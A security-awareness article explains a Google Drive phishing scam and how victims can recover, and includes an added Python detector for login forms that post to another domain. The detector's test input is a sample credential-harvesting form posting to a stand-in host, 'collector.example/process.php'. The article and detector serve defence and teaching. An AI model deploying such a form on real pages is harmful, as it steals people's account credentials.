Phishing scams are nothing new in the security industry. Typically, they involve a poorly written email that points you to an awful clone site of PayPal or eBay. For most of these scams, you can’t help but notice the warning signs. However, the new Google Drive phishing scam is much more deceptive.
Using Google Drive to Phish
Here’s how this new phishing scam works. You’ll first receive an email with a subject line such as “Documents.” In the body of the email, you’ll be asked to open an important document linked from drive.google.com. When you click this link, Google Drive will ask you to log in. Not only will the login form look identical to the real one, but the domain will look correct as well.
In many phishing scams, the domain of the web page is a giveaway. For instance, the page will claim to be the PayPal login, but the URL will not be from PayPal. However, the new Google Drive phishing scam removes this red flag. The address will say ‘Google.com.’ That’s because the official-looking login page is actually a preview page for a folder stored on Google Drive.
Thinking the page is safe, you’ll enter your login credentials. The information is sent to a PHP form processing page on the hacker’s domain. The processing page records your information and sends it to the hacker.
When it’s over, you’re shown an actual document to reduce the chance that you’ll realize what happened. However, at this point, your Google account is compromised, and scammers can now log in and use your email or any other Google services linked to your account.
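One defender-side check that follows from the mechanics above, as an added example that is not from the original article: because the address bar shows a Google host while the form posts to another domain, compare the host each password form submits to with the host serving the page. The page URL, the `collector.example` host and the markup are constructed samples.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Record each <form>'s action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []      # one dict per <form>, in document order
        self.current = None  # the form being parsed, or None outside a form

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self.current)
        elif tag == "input" and self.current and (a.get("type") or "").lower() == "password":
            self.current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None


def offsite_password_forms(page_url, html):
    """Return hosts, other than the page's own, that password forms submit to."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    flagged = []
    for form in collector.forms:
        # Empty and relative actions resolve against the page URL (same host).
        target = (urlsplit(urljoin(page_url, form["action"])).hostname or "").lower()
        if form["has_password"] and target != page_host:
            flagged.append(target)
    return flagged


# Constructed sample: look-alike login on a Google host, then a same-host control.
SAMPLE_URL = "https://www.google.com/preview/placeholder-folder/login.html"
SAMPLE_HTML = """
<form action="http://collector.example/process.php" method="post">
  <input type="email" name="Email"><input type="PASSWORD" name="Passwd">
</form>
<form action="/ServiceLogin"><input type="password" name="Passwd"></form>
"""
print(offsite_password_forms(SAMPLE_URL, SAMPLE_HTML))
```

A form submitted by script rather than through its `action` attribute would not be caught, so treat a clean result as one signal rather than proof that a page is safe.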
Why Scammers Go for Google Accounts
Google accounts are the primary target for phishing scammers. Scammers use your Gmail account to spam their phishing link to your contacts. Since your contacts recognize your email address, they are more likely to fall victim to the scam. Scammers can also read any important documents or information stored in your email account.
A stolen Google account exposes more than just email, though. Scammers can gain access to Google Play Music. They can access your Google Wallet. They can generate the HTML file needed to verify your website in Webmaster Tools, which exposes your website’s reporting data. They can affect your AdWords campaigns or view your AdSense data. They can even spam a phishing link using your G+ profile.
Some of these consequences seem minor, but users who integrate Google into their lives store a lot of sensitive information in these accounts. The severity of the consequences depends on the hacker’s creativity and the amount of information exposed.
What Can You Do?
In general, don’t open links from unfamiliar email addresses. Even if you know the sender, be suspicious of links to Google Drive that you were not expecting.
If you think you’ve been scammed, the first step is to change your Google account password. Then, log in to Gmail and scroll down to the bottom of the page. Click “Details” under the “Last Account Activity” text. Click “Sign out all other sessions” to lock out hackers who are currently logged in to your account.
Google also offers two-step verification. Two-step verification sends a PIN to your phone when you log in from a computer that isn’t your personal one. This security process stops hackers from ever signing in to your account, even if they have your password.
A hacker’s goal is to bypass security red flags and firewalls. This scam creatively hides the warning signs that would normally help people avoid it. If you think you’ve received one of these phishing emails, send it to the trash or report it to Google.
Contact Sensible about our Employee Security Awareness Training program. This self-paced program teaches your staff how to identify email phishing and scams.
Google has issued a statement indicating “We’ve removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password.”
Based on Google’s statement, the issue appears solved; however, we have continued to find reports of the exploit, indicating that it may still be ongoing.